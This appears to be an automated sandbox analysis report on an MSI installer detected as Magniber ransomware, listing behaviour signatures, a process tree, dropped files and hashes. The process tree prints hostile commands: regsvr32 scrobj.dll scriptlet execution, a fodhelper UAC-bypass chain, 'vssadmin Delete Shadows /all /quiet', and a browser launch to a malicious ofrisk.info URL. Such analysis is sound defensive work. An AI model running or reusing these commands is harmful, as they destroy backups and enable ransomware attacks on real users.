Analysis

  • max time kernel
    147s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-08-2024 03:41

General

  • Target

    41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi

  • Size

    96KB

  • MD5

    42ad49ed99c0d41a820316309bc2c3b3

  • SHA1

    f447a72b3cbea72e1b56fda8f44fd9f304b4474a

  • SHA256

    41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e

  • SHA512

    4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75

  • SSDEEP

    1536:kiqCWq/Gf2CJ7ZrhzZr98n+lW0D80D+7fxun:xqCWqu+q8nLLxun

Malware Config

Signatures

  • Detect magniber ransomware 1 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (105) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • System Binary Proxy Execution: Regsvr32 1 TTPs 9 IoCs

    Abuse Regsvr32 to proxy execution of malicious code.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 9 IoCs
  • Loads dropped DLL 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
      2⤵
      • System Binary Proxy Execution: Regsvr32
      • Modifies registry class
      PID:2364
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
        PID:3824
        • C:\Windows\system32\fodhelper.exe
          fodhelper.exe
          3⤵
            PID:2004
            • C:\Windows\system32\regsvr32.exe
              "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
              4⤵
              • System Binary Proxy Execution: Regsvr32
              PID:1280
              • C:\Windows\System32\vssadmin.exe
                "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                5⤵
                • Interacts with shadow copies
                PID:3824
        • C:\Windows\system32\cmd.exe
          cmd /c "start fodhelper.exe"
          2⤵
            PID:1184
            • C:\Windows\system32\fodhelper.exe
              fodhelper.exe
              3⤵
                PID:3228
                • C:\Windows\system32\regsvr32.exe
                  "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                  4⤵
                  • System Binary Proxy Execution: Regsvr32
                  PID:3492
                  • C:\Windows\System32\vssadmin.exe
                    "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                    5⤵
                    • Interacts with shadow copies
                    PID:2896
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:3020
            • C:\Windows\system32\regsvr32.exe
              regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
              2⤵
              • System Binary Proxy Execution: Regsvr32
              • Modifies registry class
              PID:4592
            • C:\Windows\system32\cmd.exe
              cmd /c "start fodhelper.exe"
              2⤵
                PID:1036
                • C:\Windows\system32\fodhelper.exe
                  fodhelper.exe
                  3⤵
                    PID:4764
                    • C:\Windows\system32\regsvr32.exe
                      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                      4⤵
                      • System Binary Proxy Execution: Regsvr32
                      PID:5084
                      • C:\Windows\System32\vssadmin.exe
                        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                        5⤵
                        • Interacts with shadow copies
                        PID:4028
                • C:\Windows\system32\cmd.exe
                  cmd /c "start fodhelper.exe"
                  2⤵
                    PID:372
                    • C:\Windows\system32\fodhelper.exe
                      fodhelper.exe
                      3⤵
                        PID:4340
                        • C:\Windows\system32\regsvr32.exe
                          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                          4⤵
                          • System Binary Proxy Execution: Regsvr32
                          PID:3556
                          • C:\Windows\System32\vssadmin.exe
                            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                            5⤵
                            • Interacts with shadow copies
                            PID:64
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3160
                    • C:\Windows\system32\regsvr32.exe
                      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
                      2⤵
                      • System Binary Proxy Execution: Regsvr32
                      • Modifies registry class
                      PID:3780
                    • C:\Windows\system32\cmd.exe
                      cmd /c "start fodhelper.exe"
                      2⤵
                        PID:2960
                        • C:\Windows\system32\fodhelper.exe
                          fodhelper.exe
                          3⤵
                            PID:3500
                            • C:\Windows\system32\regsvr32.exe
                              "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                              4⤵
                              • System Binary Proxy Execution: Regsvr32
                              PID:4636
                              • C:\Windows\System32\vssadmin.exe
                                "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                5⤵
                                • Interacts with shadow copies
                                PID:4116
                        • C:\Windows\system32\cmd.exe
                          cmd /c "start fodhelper.exe"
                          2⤵
                            PID:64
                            • C:\Windows\system32\fodhelper.exe
                              fodhelper.exe
                              3⤵
                                PID:4764
                                • C:\Windows\system32\regsvr32.exe
                                  "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                                  4⤵
                                  • System Binary Proxy Execution: Regsvr32
                                  PID:2780
                                  • C:\Windows\System32\vssadmin.exe
                                    "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                    5⤵
                                    • Interacts with shadow copies
                                    PID:4792
                          • C:\Windows\system32\msiexec.exe
                            msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
                            1⤵
                            • Enumerates connected drives
                            • Event Triggered Execution: Installer Packages
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:2868
                          • C:\Windows\system32\msiexec.exe
                            C:\Windows\system32\msiexec.exe /V
                            1⤵
                            • Enumerates connected drives
                            • Drops file in Windows directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4848
                            • C:\Windows\system32\srtasks.exe
                              C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                              2⤵
                                PID:2368
                              • C:\Windows\System32\MsiExec.exe
                                C:\Windows\System32\MsiExec.exe -Embedding 24A418637D146F136416107A9C10BA30
                                2⤵
                                • Suspicious use of SetThreadContext
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                • Suspicious use of WriteProcessMemory
                                PID:4232
                                • C:\Windows\System32\cmd.exe
                                  cmd /c "start microsoft-edge:http://e4849888bca4c080686ctbodbmuw.ofrisk.info/tbodbmuw^&2^&45737672^&105^&477^&2219041
                                  3⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1420
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://e4849888bca4c080686ctbodbmuw.ofrisk.info/tbodbmuw&2&45737672&105&477&2219041
                                    4⤵
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    • Suspicious use of WriteProcessMemory
                                    PID:2160
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xbc,0x128,0x7ffe5f8046f8,0x7ffe5f804708,0x7ffe5f804718
                                      5⤵
                                        PID:1988
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
                                        5⤵
                                          PID:1300
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
                                          5⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1168
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
                                          5⤵
                                            PID:2000
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                            5⤵
                                              PID:1804
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                              5⤵
                                                PID:4816
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:1
                                                5⤵
                                                  PID:5088
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:1
                                                  5⤵
                                                    PID:372
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
                                                    5⤵
                                                      PID:3048
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
                                                      5⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2868
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1
                                                      5⤵
                                                        PID:4904
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:1
                                                        5⤵
                                                          PID:2820
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:1
                                                          5⤵
                                                            PID:3248
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
                                                            5⤵
                                                              PID:4852
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:1
                                                              5⤵
                                                                PID:4992
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:1
                                                                5⤵
                                                                  PID:4840
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,11910429861919776995,6424414373769478161,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
                                                                  5⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4500
                                                        • C:\Windows\system32\vssvc.exe
                                                          C:\Windows\system32\vssvc.exe
                                                          1⤵
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2060
                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                          1⤵
                                                            PID:3028
                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                            1⤵
                                                              PID:4988

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Config.Msi\e58076e.rbs

                                                              Filesize

                                                              7KB

                                                              MD5

                                                              1ca7718b5b10c6ba630df85e692fd924

                                                              SHA1

                                                              a3d54bdea4707d5c680bee16660887c9b187ddbc

                                                              SHA256

                                                              17db8d2c72abd27f6b4d867510a82339cebb119f5c6e7d4b349a7f32a7e1a437

                                                              SHA512

                                                              14882662e975ea8d9c9218d5b505fe529b7d7574bc807db97fa8bd709556a29558ac76f0b1bebc213519d3a7dabe5164d8c31f51a0c63a0c5bf965cb91b0064c

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                              Filesize

                                                              152B

                                                              MD5

                                                              38f59a47b777f2fc52088e96ffb2baaf

                                                              SHA1

                                                              267224482588b41a96d813f6d9e9d924867062db

                                                              SHA256

                                                              13569c5681c71dc42ab57d34879f5a567d7b94afe0e8f6d7c6f6c1314fb0087b

                                                              SHA512

                                                              4657d13e1bb7cdd7e83f5f2562f5598cca12edf839626ae96da43e943b5550fab46a14b9018f1bec90de88cc714f637605531ccda99deb9e537908ddb826113b

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                              Filesize

                                                              152B

                                                              MD5

                                                              ab8ce148cb7d44f709fb1c460d03e1b0

                                                              SHA1

                                                              44d15744015155f3e74580c93317e12d2cc0f859

                                                              SHA256

                                                              014006a90e43ea9a1903b08b843a5aab8ad3823d22e26e5b113fad5f9fa620ff

                                                              SHA512

                                                              f685423b1eaee18a2a06030b4b2977335f62499c0041c142a92f6e6f846c2b9ce54324b6ae94efbbb303282dcda70e2b1597c748fddc251c0b3122a412c2d7c4

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                              Filesize

                                                              6KB

                                                              MD5

                                                              1f937734678c1e4ed1a0a44416382649

                                                              SHA1

                                                              9f3130f1d7f10a4f1028c85838b684dbca9c7684

                                                              SHA256

                                                              fa6ba9f5887d3078d307fceaacacfb57989e02b5f6243895ce513f6a03951c9d

                                                              SHA512

                                                              90b3333d3959035e2006909f6c86d115b032422486166a99349a424a60f41207379ea3903ddf28b3352cb48a8619f2d1a8394662aa96a442cfc6332cad8e6dbb

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                              Filesize

                                                              6KB

                                                              MD5

                                                              db3196bdf80dec0829f2baf56696244c

                                                              SHA1

                                                              e10be2e70274f9bcbd8414cfd29a549e173d9991

                                                              SHA256

                                                              95d6e867e13c2fdccfaca5f0c224403eff5febfc0eeb802119db2f510d6b08db

                                                              SHA512

                                                              42547f9a2ba88040be0009dd5b6d760aa8ef6672aa70314e4569e8abb521a486b0b12f6d7ca73f06ae47115ba651f1e58ae4089030b0054a31950e9f8a57bedd

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                              Filesize

                                                              16B

                                                              MD5

                                                              6752a1d65b201c13b62ea44016eb221f

                                                              SHA1

                                                              58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                              SHA256

                                                              0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                              SHA512

                                                              9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                              Filesize

                                                              11KB

                                                              MD5

                                                              13cd7c509d871d93caa67e1f32c92794

                                                              SHA1

                                                              ba586fcd8f0de965262bd0b2e78b3819b02677b2

                                                              SHA256

                                                              6fc1a579d9d70629f7f80fb490d947acdcce6ccf686075dc33eb30e45a646533

                                                              SHA512

                                                              90a17fc1d76e5003fc8370a96ac2acc73eca2bcfddf2b18c8aed3a79abafbde23355b742881f47bef4b288f6df58951b440488f4066d4ff08b6e865dad38b960

                                                            • C:\Users\Admin\Pictures\README.html

                                                              Filesize

                                                              17KB

                                                              MD5

                                                              d947bcce8097f3daada4c931fad417a6

                                                              SHA1

                                                              78135847cb30754ccab58f1161342a6259a63b3f

                                                              SHA256

                                                              4fb1ca4697d538d61ba6de7d05d3f0686492d05c70917d0983cb9a52ec295f8a

                                                              SHA512

                                                              44a67a7a8d6593efd09e17cb6ad1d5c631d13a9df4ec833af9dbd69ebdeb653f7f0aa69adaf3da1a440e8c4d2a58e0c339d75d55da293313329e3966000580d3

                                                            • C:\Users\Public\dsv3cwbg27yh

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              947919690674ae37064deafb3fa326db

                                                              SHA1

                                                              b79f7f3ad22c9e84546750502f517d16a7618366

                                                              SHA256

                                                              fa4d045e690fbaa4f22fc3827f168e59791e1677ee6c5888a37aa8caf964d801

                                                              SHA512

                                                              c7fcc911acc3084985f07add40a0a41d6628ca567016551196744444e39a562444385647ea5741357bf8bc49695e9cd83cb9d6c45be6f71ef31263b52ba0e32b

                                                            • C:\Users\Public\x5m0mhr74m7

                                                              Filesize

                                                              4KB

                                                              MD5

                                                              a756835ce38c068139d8fad26cb47fed

                                                              SHA1

                                                              c1bb3d145188606d07e7b29d86ea6a08586e268d

                                                              SHA256

                                                              d5cfccfe2e3f5ecb566543c74f2972176f61a857234fd33a48325e9459742a78

                                                              SHA512

                                                              d18aa222daf8c3e51e5bf58d2c6ff531b0db92a03f8546efa8add0ac77de4649b1cc73811ad991cc75eb2a9eb22b07ca5d0924569440aba99ce0416527547fac

                                                            • C:\Windows\Installer\MSI7FA.tmp

                                                              Filesize

                                                              56KB

                                                              MD5

                                                              91de8a79098ac3d20726e1acb50cd05d

                                                              SHA1

                                                              9cb04003c75f0cb63fe0c6dcd22a0c64d63154be

                                                              SHA256

                                                              54f8d71fb3117854743d594aa28427b943e5b2fb46f6003dbf4a9b562ebbfcea

                                                              SHA512

                                                              70cf1fe2c4d9b68c12b30df9013c4a1fd5b5a9fef1de704a42535259d1196b35eca6191270b19dedc4d3699b8211868b6b31a5ae3cccdc24711fb335fc32edc3

                                                            • C:\Windows\Installer\e58076d.msi

                                                              Filesize

                                                              96KB

                                                              MD5

                                                              42ad49ed99c0d41a820316309bc2c3b3

                                                              SHA1

                                                              f447a72b3cbea72e1b56fda8f44fd9f304b4474a

                                                              SHA256

                                                              41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e

                                                              SHA512

                                                              4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75

                                                            • \??\pipe\LOCAL\crashpad_2160_BSWWHOKFYIBEIYPU

                                                              MD5

                                                              d41d8cd98f00b204e9800998ecf8427e

                                                              SHA1

                                                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                              SHA256

                                                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                              SHA512

                                                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                            • memory/2952-11-0x000001BF99BE0000-0x000001BF99BE3000-memory.dmp

                                                              Filesize

                                                              12KB